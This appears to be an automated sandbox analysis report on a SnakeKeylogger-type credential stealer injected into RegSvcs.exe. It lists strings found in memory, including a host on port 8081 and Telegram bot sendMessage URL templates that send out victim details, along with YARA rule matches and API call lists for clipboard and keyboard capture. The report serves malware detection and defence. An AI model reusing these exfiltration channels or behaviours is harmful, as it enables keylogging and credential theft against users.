                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000002.00000002.4597170534.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: RegSvcs.exe, 00000002.00000002.4609902468.0000000006100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002CDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.irco.com.sa
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: SP0npSA64a.exe, 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002B8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002B8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4598521069.0000000002BFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000002.00000002.4598521069.0000000002D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49817 version: TLS 1.2
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                  System Summary

                  barindex
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: SP0npSA64a.exe PID: 6220, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004096A00_2_004096A0
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0042200C0_2_0042200C
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0041A2170_2_0041A217
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004122160_2_00412216
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0042435D0_2_0042435D
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004033C00_2_004033C0
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044F4300_2_0044F430
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004125E80_2_004125E8
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044663B0_2_0044663B
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004138010_2_00413801
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0042096F0_2_0042096F
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004129D00_2_004129D0
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004119E30_2_004119E3
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0040FA100_2_0040FA10
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00423C810_2_00423C81
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00411E780_2_00411E78
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00442E0C0_2_00442E0C
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00420EC00_2_00420EC0
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044CF170_2_0044CF17
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00444FD20_2_00444FD2
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_03FA86700_2_03FA8670
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_03FABE780_2_03FABE78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011A71182_2_011A7118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011AC1462_2_011AC146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011AA0882_2_011AA088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011A53622_2_011A5362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011AD2782_2_011AD278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011AC4682_2_011AC468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011AC7382_2_011AC738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011AE9882_2_011AE988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011A69A02_2_011A69A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011ACA082_2_011ACA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011ACCD82_2_011ACCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011ACFAB2_2_011ACFAB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011AE97B2_2_011AE97B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011AF9612_2_011AF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011A39EE2_2_011A39EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011A29EC2_2_011A29EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011A3AA12_2_011A3AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_011A3E092_2_011A3E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057081D02_2_057081D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05707B782_2_05707B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05708FB02_2_05708FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570C5582_2_0570C558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05700D482_2_05700D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570E5482_2_0570E548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570C5482_2_0570C548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570A9382_2_0570A938
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570E5382_2_0570E538
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05700D392_2_05700D39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570A9282_2_0570A928
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057015F82_2_057015F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570C9E82_2_0570C9E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057015E82_2_057015E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570E9D82_2_0570E9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570C9D82_2_0570C9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570E9C82_2_0570E9C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057011A02_2_057011A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057011902_2_05701190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057064782_2_05706478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057034602_2_05703460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057034502_2_05703450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057000402_2_05700040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057060302_2_05706030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570BC382_2_0570BC38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057060222_2_05706022
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570DC282_2_0570DC28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570BC2A2_2_0570BC2A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570FC182_2_0570FC18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570DC192_2_0570DC19
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057000072_2_05700007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057030082_2_05703008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057008F02_2_057008F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057008E02_2_057008E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570C0C82_2_0570C0C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570C0B72_2_0570C0B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057038B82_2_057038B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570E0B82_2_0570E0B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570E0A72_2_0570E0A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057004982_2_05700498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057064882_2_05706488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057004892_2_05700489
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057057702_2_05705770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570F7782_2_0570F778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05707B692_2_05707B69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057027582_2_05702758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057027492_2_05702749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057077202_2_05707720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057053282_2_05705328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057077102_2_05707710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570B3182_2_0570B318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570531A2_2_0570531A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057023002_2_05702300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570B3072_2_0570B307
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570D3082_2_0570D308
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05702FF92_2_05702FF9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05705BD82_2_05705BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05702BB02_2_05702BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05702BA02_2_05702BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05708FA12_2_05708FA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570B7A82_2_0570B7A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570D7982_2_0570D798
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570B7982_2_0570B798
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057057802_2_05705780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570D7872_2_0570D787
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570F7882_2_0570F788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05706E702_2_05706E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05704A782_2_05704A78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570CE782_2_0570CE78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05706E622_2_05706E62
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570CE672_2_0570CE67
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570EE682_2_0570EE68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05704A682_2_05704A68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05701A502_2_05701A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570EE572_2_0570EE57
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05701A412_2_05701A41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057046202_2_05704620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057046102_2_05704610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05706A182_2_05706A18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057022F02_2_057022F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570D2F72_2_0570D2F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570F2F82_2_0570F2F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0570F2E72_2_0570F2E7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05704ED02_2_05704ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05704EC62_2_05704EC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057072C82_2_057072C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_057072B82_2_057072B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05701EA82_2_05701EA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05701E982_2_05701E98
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: String function: 004115D7 appears 36 times
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: String function: 00416C70 appears 39 times
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: String function: 00445AE0 appears 55 times
                  Source: SP0npSA64a.exe, 00000000.00000003.2226120288.0000000004733000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SP0npSA64a.exe
